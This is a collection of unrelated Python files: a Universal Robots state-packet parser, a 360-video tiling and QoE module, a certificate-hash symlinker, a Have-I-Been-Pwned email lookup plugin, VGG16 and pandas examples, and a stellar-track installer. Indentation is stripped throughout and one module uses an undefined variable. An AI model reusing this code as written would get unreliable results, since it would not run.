all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
###
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
return rs
#this parses RobotStateRT for versions <= v1.8 (i.e. 1.6, 1.7, 1.8)
class RobotStateRT_V18(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V18()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 15x double (15x 8byte)
offset+=120
rs.unused = []
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector = copy.deepcopy(all_values)
#tcp_speed: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_mode: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
return rs
#this parses RobotStateRT for versions >=3.0 (i.e. 3.0)
class RobotStateRT_V30(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'i_control',
'tool_vector_actual', 'tcp_speed_actual', 'tcp_force',
'tool_vector_target', 'tcp_speed_target',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value',
'robot_mode', 'joint_modes', 'safety_mode',
#6xd: unused
'tool_acc_values',
#6xd: unused
'speed_scaling', 'linear_momentum_norm',
#2xd: unused
'v_main', 'v_robot', 'i_robot', 'v_actual']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V30()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_target = copy.deepcopy(all_values)
#m_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.m_target = copy.deepcopy(all_values)
#q_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_actual = copy.deepcopy(all_values)
#qd_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_actual = copy.deepcopy(all_values)
#i_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_actual = copy.deepcopy(all_values)
#i_control: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.i_control = copy.deepcopy(all_values)
#tool_vector_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_actual = copy.deepcopy(all_values)
#tcp_speed_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_actual = copy.deepcopy(all_values)
#tcp_force: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_force = copy.deepcopy(all_values)
#tool_vector_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tool_vector_target = copy.deepcopy(all_values)
#tcp_speed_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.tcp_speed_target = copy.deepcopy(all_values)
#digital_input_bits: 1x double (1x 8byte) ?
rs.digital_input_bits = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#motor_temperatures: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.motor_temperatures = copy.deepcopy(all_values)
#controller_timer: 1x double (1x 8byte)
rs.controller_timer = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#test_value: 1x double (1x 8byte)
rs.test_value = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#robot_mode: 1x double (1x 8byte)
rs.robot_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#joint_modes: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.joint_modes = copy.deepcopy(all_values)
#safety_mode: 1x double (1x 8byte)
rs.safety_mode = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 6x double (6x 8byte)
offset+=48
#tool_acc_values: 3x double (3x 8byte)
all_values = list(struct.unpack_from("!ddd",buf, offset))
offset+=3*8
rs.tool_acc_values = copy.deepcopy(all_values)
#unused: 6x double (6x 8byte)
offset+=48
#speed_scaling: 1x double (1x 8byte)
rs.speed_scaling = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#linear_momentum_norm: 1x double (1x 8byte)
rs.linear_momentum_norm = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#unused: 2x double (2x 8byte)
offset+=16
#v_main: 1x double (1x 8byte)
rs.v_main = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_robot: 1x double (1x 8byte)
rs.v_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#i_robot: 1x double (1x 8byte)
rs.i_robot = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#v_actual: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.v_actual = copy.deepcopy(all_values)
return rs
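# Illustrative use (an addition, not part of the original module): a packet read
# from the UR controller's real-time interface can be decoded through the
# version dispatcher above. The socket handling below is an assumption about
# typical usage; 30003 is the UR real-time port.
#     import socket
#     sock = socket.create_connection(("192.168.0.10", 30003))   # hypothetical robot IP
#     buf = sock.recv(4096)                 # one raw real-time packet (assuming it arrives whole)
#     state = RobotStateRT.unpack(buf)      # returns the version-specific state object
#     print(state.q_actual)                 # six actual joint positions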
|
30046
|
import numpy as np
import math
import pickle
def get_data(data, frame_nos, dataset, topic, usernum, fps, milisec, width, height, view_width, view_height):
"""
Read and return the viewport data
"""
VIEW_PATH = '../../Viewport/'
view_info = pickle.load(open(VIEW_PATH + 'ds{}/viewport_ds{}_topic{}_user{}'.format(dataset, dataset, topic, usernum), 'rb'), encoding='latin1')
if dataset == 1:
max_frame = int(view_info[-1][0]*1.0*fps/milisec)
for i in range(len(view_info)-1):
frame = int(view_info[i][0]*1.0*fps/milisec)
frame += int(offset*1.0*fps/milisec)
frame_nos.append(frame)
if(frame > max_frame):
break
X={}
X['VIEWPORT_x']=int(view_info[i][1][1]*width/view_width)
X['VIEWPORT_y']=int(view_info[i][1][0]*height/view_height)
data.append((X, int(view_info[i+1][1][1]*width/view_width),int(view_info[i+1][1][0]*height/view_height)))
elif dataset == 2:
for k in range(len(view_info)-1):
if view_info[k][0]<=offset+60 and view_info[k+1][0]>offset+60:
max_frame = int(view_info[k][0]*1.0*fps/milisec)
break
for k in range(len(view_info)-1):
if view_info[k][0]<=offset and view_info[k+1][0]>offset:
min_index = k+1
break
prev_frame = 0
for i in range(min_index,len(view_info)-1):
frame = int((view_info[i][0])*1.0*fps/milisec)
if frame == prev_frame:
continue
if(frame > max_frame):
break
frame_nos.append(frame)
X={}
X['VIEWPORT_x']=int(view_info[i][1][1]*width/view_width)
X['VIEWPORT_y']=int(view_info[i][1][0]*height/view_height)
data.append((X, int(view_info[i+1][1][1]*width/view_width),int(view_info[i+1][1][0]*height/view_height)))
prev_frame = frame
return data, frame_nos, max_frame
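# Each element appended to `data` above is a tuple of the form
#     ({'VIEWPORT_x': int, 'VIEWPORT_y': int}, next_x, next_y)
# i.e. the current viewport position scaled to the target resolution, paired
# with the viewport position of the following sample.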
def tiling(data, frame_nos, max_frame, width, height, nrow_tiles, ncol_tiles, fps, pred_nframe):
"""
Calculate the tiles corresponding to the viewport and segment them into different chunks
"""
count=0
i=0
act_tiles = []
chunk_frames = []
	# Skip the first 5 seconds (to stay consistent with our model)
while True:
curr_frame = frame_nos[i]
if curr_frame<5*fps:
i=i+1
[inp_i,x,y]=data[curr_frame]
else:
break
	# Calculate the tiles and store them in chunks
while True:
curr_frame = frame_nos[i]
nframe = min(pred_nframe, max_frame - frame_nos[i])
if(nframe <= 0):
break
# Add the frames that will be in the current chunk
frames = {i}
for k in range(i+1, len(frame_nos)):
if(frame_nos[k] < curr_frame + nframe):
frames.add(k)
else:
i=k
break
if(i!=k):
i=k
if(i==(len(frame_nos)-1)):
break
frames = sorted(frames)
chunk_frames.append(frames)
# Get the actual tile
for k in range(len(frames)):
[inp_k, x_act, y_act] = data[frames[k]]
# print(x_act, y_act)
actual_tile_col = int(x_act * ncol_tiles / width)
actual_tile_row = int(y_act * nrow_tiles / height)
# print(actual_tile_col, actual_tile_row)
actual_tile_row = actual_tile_row-nrow_tiles if(actual_tile_row >= nrow_tiles) else actual_tile_row
actual_tile_col = actual_tile_col-ncol_tiles if(actual_tile_col >= ncol_tiles) else actual_tile_col
actual_tile_row = actual_tile_row+nrow_tiles if actual_tile_row < 0 else actual_tile_row
actual_tile_col = actual_tile_col+ncol_tiles if actual_tile_col < 0 else actual_tile_col
# print(actual_tile_col, actual_tile_row)
# print()
act_tiles.append((actual_tile_row, actual_tile_col))
return act_tiles, chunk_frames
def alloc_bitrate(frame_nos, chunk_frames, pref_bitrate, nrow_tiles, ncol_tiles):
"""
Allocates equal bitrate to all the tiles
"""
vid_bitrate = []
for i in range(len(chunk_frames)):
chunk = chunk_frames[i]
chunk_bitrate = [[-1 for x in range(ncol_tiles)] for y in range(nrow_tiles)]
chunk_weight = [[1. for x in range(ncol_tiles)] for y in range(nrow_tiles)]
total_weight = sum(sum(x) for x in chunk_weight)
for x in range(nrow_tiles):
for y in range(ncol_tiles):
chunk_bitrate[x][y] = chunk_weight[x][y]*pref_bitrate/total_weight;
vid_bitrate.append(chunk_bitrate)
return vid_bitrate
def calc_qoe(vid_bitrate, act_tiles, frame_nos, chunk_frames, width, height, nrow_tiles, ncol_tiles, player_width, player_height):
"""
Calculate QoE based on the video bitrates
"""
qoe = 0
prev_qoe_1 = 0
weight_1 = 1
weight_2 = 1
weight_3 = 1
tile_width = width/ncol_tiles
tile_height = height/nrow_tiles
for i in range(len(chunk_frames[:55])):
qoe_1, qoe_2, qoe_3, qoe_4 = 0, 0, 0, 0
tile_count = 0
rows, cols = set(), set()
rate = []
chunk = chunk_frames[i]
chunk_bitrate = vid_bitrate[i]
chunk_act = act_tiles[chunk[0]-chunk_frames[0][0] : chunk[-1]-chunk_frames[0][0]]
for j in range(len(chunk_act)):
if(chunk_act[j][0] not in rows or chunk_act[j][1] not in cols):
tile_count += 1
rows.add(chunk_act[j][0])
cols.add(chunk_act[j][1])
row, col = chunk_act[j][0], chunk_act[j][1]
			# Find the number of tiles that can be accommodated from the center of the viewport
n_tiles_width = math.ceil((player_width/2 - tile_width/2)/tile_width)
n_tiles_height = math.ceil((player_height/2 - tile_height/2)/tile_height)
tot_tiles = (2 * n_tiles_width+1) * (2 * n_tiles_height+1)
local_qoe = 0
local_rate = [] # a new metric to get the standard deviation of bitrate within the player view (qoe2)
for x in range(2*n_tiles_height+1):
for y in range(2*n_tiles_width+1):
sub_row = row - n_tiles_height + x
sub_col = col - n_tiles_width + y
sub_row = nrow_tiles+row+sub_row if sub_row < 0 else sub_row
sub_col = ncol_tiles+col+sub_col if sub_col < 0 else sub_col
sub_row = sub_row-nrow_tiles if sub_row >= nrow_tiles else sub_row
sub_col = sub_col-ncol_tiles if sub_col >= ncol_tiles else sub_col
local_qoe += chunk_bitrate[sub_row][sub_col]
local_rate.append(chunk_bitrate[sub_row][sub_col])
qoe_1 += local_qoe / tot_tiles
if(len(local_rate)>0):
qoe_2 += np.std(local_rate)
rate.append(local_qoe / tot_tiles)
tile_count = 1 if tile_count==0 else tile_count
qoe_1 /= tile_count
qoe_2 /= tile_count
if(len(rate)>0):
qoe_3 = np.std(rate)
qoe_3 /= tile_count
if(i>0):
qoe_4 = abs(prev_qoe_1 - qoe_1)
qoe += qoe_1 - weight_1*qoe_2 - weight_2*qoe_3 - weight_3*qoe_4
prev_qoe_1 = qoe_1
return qoe
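# Reading of the QoE terms computed above (an interpretation of this code, not
# an authoritative definition):
#   qoe_1: average bitrate inside the player view, averaged over the distinct
#          viewport tiles of the chunk (higher is better)
#   qoe_2: average spatial standard deviation of bitrate within a player view
#   qoe_3: standard deviation of the per-view average bitrates within the chunk
#   qoe_4: change in qoe_1 between consecutive chunks
# Each chunk contributes qoe_1 - weight_1*qoe_2 - weight_2*qoe_3 - weight_3*qoe_4.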
|
30081
|
import os
import os.path
import subprocess
import sys
if __name__ == "__main__":
dirname = sys.argv[1]
for x in os.listdir(dirname):
if x.endswith('.crt'):
try:
filename = os.path.join(dirname, x)
                filehash = subprocess.check_output(['openssl', 'x509', '-noout', '-hash', '-in', filename])
                filehash = filehash.strip().decode() + '.0'  # check_output returns bytes; decode before building the filename
hash_filename = os.path.join(dirname, filehash)
if os.path.exists(hash_filename):
print(x, filehash)
os.remove(hash_filename)
os.symlink(x, hash_filename)
            except Exception:
print("error in handling file:", filename)
|
30134
|
import time
import requests
from core.utils.parser import Parser
from core.utils.helpers import Helpers
from core.models.plugin import BasePlugin
class HIBP(BasePlugin):
def __init__(self, args):
self.args = args
self.base_url = "https://haveibeenpwned.com/api/v2/breachedaccount"
self.url_parameters = "truncateResponse=true&includeUnverified=true"
def execute(self, data):
Helpers.print_warning("Starting Have I Been Pwned plugin...", jumpline=True)
all_emails = Parser(self.args).all_unique_emails(data)
if all_emails:
self.check_all_emails(all_emails)
return True
return False
def check_authors(self, authors):
for author in authors:
time.sleep(2)
self.check_email(author.email)
def check_all_emails(self, emails):
for email in emails:
time.sleep(2)
self.check_email(email)
def check_email(self, email):
try:
url = "{}/{}?{}".format(self.base_url, email, self.url_parameters)
r = requests.get(url)
if r.status_code == 503:
Helpers.print_error("hibp: IP got in DDoS protection by CloudFare")
elif r.status_code == 429:
Helpers.print_error("hibp: Throttled by HIBP API")
elif r.text:
r = r.json()
print("\n{} leaks:".format(email))
for leak in r:
print("\t- {}".format(leak["Name"]))
return True
return False
except Exception as e:
Helpers.print_error(e)
return False
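# Usage sketch (illustrative; the surrounding framework normally constructs and
# drives plugins itself, and the HIBP v2 endpoint may require an API key today):
#     plugin = HIBP(args=None)
#     plugin.check_email("someone@example.com")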
|
30189
|
import tensorflow as tf
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras import models
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
import numpy as np
import cv2
# prebuild model with pre-trained weights on imagenet
base_model = VGG16(weights='imagenet', include_top=True)
print (base_model)
for i, layer in enumerate(base_model.layers):
print (i, layer.name, layer.output_shape)
# extract features from block4_pool block
model = models.Model(inputs=base_model.input,
outputs=base_model.get_layer('block4_pool').output)
img_path = 'cat.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
# get the features from this block
features = model.predict(x)
print(features)
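# For a 224x224 RGB input, VGG16's block4_pool output has shape (1, 14, 14, 512),
# so features.shape here should be (1, 14, 14, 512).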
|
30194
|
import pandas as pd
import numpy as np
print(pd.__version__)
# 1.0.0
print(pd.DataFrame.agg is pd.DataFrame.aggregate)
# True
df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]})
print(df)
# A B
# 0 0 3
# 1 1 4
# 2 2 5
print(df.agg(['sum', 'mean', 'min', 'max']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
# min 0.0 3.0
# max 2.0 5.0
print(type(df.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg(['sum']))
# A B
# sum 3 12
print(type(df.agg(['sum'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg('sum'))
# A 3
# B 12
# dtype: int64
print(type(df.agg('sum')))
# <class 'pandas.core.series.Series'>
print(df.agg({'A': ['sum', 'min', 'max'],
'B': ['mean', 'min', 'max']}))
# A B
# max 2.0 5.0
# mean NaN 4.0
# min 0.0 3.0
# sum 3.0 NaN
print(df.agg({'A': 'sum', 'B': 'mean'}))
# A 3.0
# B 4.0
# dtype: float64
print(df.agg({'A': ['sum'], 'B': ['mean']}))
# A B
# mean NaN 4.0
# sum 3.0 NaN
print(df.agg({'A': ['min', 'max'], 'B': 'mean'}))
# A B
# max 2.0 NaN
# mean NaN 4.0
# min 0.0 NaN
print(df.agg(['sum', 'mean', 'min', 'max'], axis=1))
# sum mean min max
# 0 3.0 1.5 0.0 3.0
# 1 5.0 2.5 1.0 4.0
# 2 7.0 3.5 2.0 5.0
s = df['A']
print(s)
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(s.agg(['sum', 'mean', 'min', 'max']))
# sum 3.0
# mean 1.0
# min 0.0
# max 2.0
# Name: A, dtype: float64
print(type(s.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.series.Series'>
print(s.agg(['sum']))
# sum 3
# Name: A, dtype: int64
print(type(s.agg(['sum'])))
# <class 'pandas.core.series.Series'>
print(s.agg('sum'))
# 3
print(type(s.agg('sum')))
# <class 'numpy.int64'>
print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'}))
# Total 3.0
# Average 1.0
# Min 0.0
# Max 2.0
# Name: A, dtype: float64
# print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']}))
# SpecificationError: nested renamer is not supported
print(df.agg(['mad', 'amax', 'dtype']))
# A B
# mad 0.666667 0.666667
# amax 2 5
# dtype int64 int64
print(df['A'].mad())
# 0.6666666666666666
print(np.amax(df['A']))
# 2
print(df['A'].dtype)
# int64
# print(df.agg(['xxx']))
# AttributeError: 'xxx' is not a valid function for 'Series' object
# print(df.agg('xxx'))
# AttributeError: 'xxx' is not a valid function for 'DataFrame' object
print(hasattr(pd.DataFrame, '__array__'))
# True
print(hasattr(pd.core.groupby.GroupBy, '__array__'))
# False
print(df.agg([np.sum, max]))
# A B
# sum 3 12
# max 2 5
print(np.sum(df['A']))
# 3
print(max(df['A']))
# 2
print(np.abs(df['A']))
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(df.agg([np.abs]))
# A B
# absolute absolute
# 0 0 3
# 1 1 4
# 2 2 5
# print(df.agg([np.abs, max]))
# ValueError: cannot combine transform and aggregation operations
def my_func(x):
return min(x) / max(x)
print(df.agg([my_func, lambda x: min(x) / max(x)]))
# A B
# my_func 0.0 0.6
# <lambda> 0.0 0.6
print(df['A'].std())
# 1.0
print(df['A'].std(ddof=0))
# 0.816496580927726
print(df.agg(['std', lambda x: x.std(ddof=0)]))
# A B
# std 1.000000 1.000000
# <lambda> 0.816497 0.816497
print(df.agg('std', ddof=0))
# A 0.816497
# B 0.816497
# dtype: float64
print(df.agg(['std'], ddof=0))
# A B
# std 1.0 1.0
df_str = df.assign(C=['X', 'Y', 'Z'])
print(df_str)
# A B C
# 0 0 3 X
# 1 1 4 Y
# 2 2 5 Z
# df_str['C'].mean()
# TypeError: Could not convert XYZ to numeric
print(df_str.agg(['sum', 'mean']))
# A B C
# sum 3.0 12.0 XYZ
# mean 1.0 4.0 NaN
print(df_str.agg(['mean', 'std']))
# A B
# mean 1.0 4.0
# std 1.0 1.0
print(df_str.agg(['sum', 'min', 'max']))
# A B C
# sum 3 12 XYZ
# min 0 3 X
# max 2 5 Z
print(df_str.select_dtypes(include='number').agg(['sum', 'mean']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
|
30209
|
import os
import re
import pickle
import numpy as np
import pandas as pd
from tqdm import tqdm
# Assign labels used in eep conversion
eep_params = dict(
age = 'Age (yrs)',
hydrogen_lum = 'L_H',
lum = 'Log L',
logg = 'Log g',
log_teff = 'Log T',
    core_hydrogen_frac = 'X_core', # not present in the raw tracks; computed in all_from_dartmouth below
core_helium_frac = 'Y_core',
teff_scale = 20, # used in metric function
lum_scale = 1, # used in metric function
# `intervals` is a list containing the number of secondary Equivalent
# Evolutionary Phases (EEPs) between each pair of primary EEPs.
intervals = [200, # Between PreMS and ZAMS
50, # Between ZAMS and EAMS
100, # Between EAMS and IAMS
100, # IAMS-TAMS
150], # TAMS-RGBump
)
def my_PreMS(track, eep_params, i0=None):
'''
Dartmouth models do not have central temperature, which is necessary for
the default PreMS calculation. For now, let the first point be the PreMS.
'''
return 0
def my_TAMS(track, eep_params, i0, Xmin=1e-5):
'''
By default, the TAMS is defined as the first point in the track where Xcen
drops below 10^-12. But not all the DSEP tracks hit this value. To ensure
the TAMS is placed correctly, here I'm using Xcen = 10^-5 as the critical
value.
'''
core_hydrogen_frac = eep_params['core_hydrogen_frac']
Xc_tr = track.loc[i0:, core_hydrogen_frac]
below_crit = Xc_tr <= Xmin
if not below_crit.any():
return -1
return below_crit.idxmax()
def my_RGBump(track, eep_params, i0=None):
'''
Modified from eep.get_RGBump to make luminosity logarithmic
'''
lum = eep_params['lum']
log_teff = eep_params['log_teff']
N = len(track)
lum_tr = track.loc[i0:, lum]
logT_tr = track.loc[i0:, log_teff]
lum_greater = (lum_tr > 1)
if not lum_greater.any():
return -1
RGBump = lum_greater.idxmax() + 1
while logT_tr[RGBump] < logT_tr[RGBump-1] and RGBump < N-1:
RGBump += 1
# Two cases: 1) We didn't reach an extremum, in which case RGBump gets
# set as the final index of the track. In this case, return -1.
# 2) We found the extremum, in which case RGBump gets set
# as the index corresponding to the extremum.
if RGBump >= N-1:
return -1
return RGBump-1
def my_HRD(track, eep_params):
'''
Adapted from eep._HRD_distance to fix lum logarithm
'''
# Allow for scaling to make changes in Teff and L comparable
Tscale = eep_params['teff_scale']
Lscale = eep_params['lum_scale']
log_teff = eep_params['log_teff']
lum = eep_params['lum']
logTeff = track[log_teff]
logLum = track[lum]
N = len(track)
dist = np.zeros(N)
for i in range(1, N):
temp_dist = (((logTeff.iloc[i] - logTeff.iloc[i-1])*Tscale)**2
+ ((logLum.iloc[i] - logLum.iloc[i-1])*Lscale)**2)
dist[i] = dist[i-1] + np.sqrt(temp_dist)
return dist
def from_dartmouth(path):
fname = path.split('/')[-1]
file_str = fname.replace('.trk', '')
mass = int(file_str[1:4])/100
met_str = file_str[7:10]
met = int(met_str[1:])/10
if met_str[0] == 'm':
met *= -1
alpha_str = file_str[13:]
alpha = int(alpha_str[1:])/10
if alpha_str[0] == 'm':
alpha *= -1
with open(path, 'r') as f:
header = f.readline()
col_line = f.readline()
data_lines = f.readlines()
columns = re.split(r'\s{2,}', col_line.strip('# \n'))
data = np.genfromtxt(data_lines)
# Build multi-indexed DataFrame, dropping unwanted columns
multi_index = pd.MultiIndex.from_tuples(
[(mass, met, step) for step in range(len(data))],
names=['initial_mass', 'initial_met', 'step'])
df = pd.DataFrame(data, index=multi_index, columns=columns)
return df
def all_from_dartmouth(raw_grids_path, progress=True):
df_list = []
filelist = [f for f in os.listdir(raw_grids_path) if '.trk' in f]
if progress:
file_iter = tqdm(filelist)
else:
file_iter = filelist
for fname in file_iter:
fpath = os.path.join(raw_grids_path, fname)
df_list.append(from_dartmouth(fpath))
dfs = pd.concat(df_list).sort_index()
# Need X_core for EEP computation
dfs['X_core'] = 1 - dfs['Y_core'] - dfs['Z_core']
return dfs
def install(
raw_grids_path,
name=None,
eep_params=eep_params,
eep_functions={'prems': my_PreMS, 'tams': my_TAMS, 'rgbump': my_RGBump},
metric_function=my_HRD,
):
'''
The main method to install grids that are output of the `rotevol` rotational
evolution tracer code.
Parameters
----------
raw_grids_path (str): the path to the folder containing the raw model grids.
name (str, optional): the name of the grid you're installing. By default,
the basename of the `raw_grids_path` will be used.
eep_params (dict, optional): contains a mapping from your grid's specific
column names to the names used by kiauhoku's default EEP functions.
It also contains 'eep_intervals', the number of secondary EEPs
between each consecutive pair of primary EEPs. By default, the params
defined at the top of this script will be used, but users may specify
their own.
eep_functions (dict, optional): if the default EEP functions won't do the
job, you can specify your own and supply them in a dictionary.
EEP functions must have the call signature
function(track, eep_params), where `track` is a single track.
If none are supplied, the default functions will be used.
metric_function (callable, None): the metric function is how the EEP
interpolator spaces the secondary EEPs. By default, the path
length along the evolution track on the H-R diagram (luminosity vs.
Teff) is used, but you can specify your own if desired.
metric_function must have the call signature
function(track, eep_params), where `track` is a single track.
If no function is supplied, defaults to dartmouth.my_HRD.
Returns None
'''
from .stargrid import from_pandas
from .stargrid import grids_path as install_path
if name is None:
name = os.path.basename(raw_grids_path)
# Create cache directories
path = os.path.join(install_path, name)
if not os.path.exists(path):
os.makedirs(path)
# Cache eep parameters
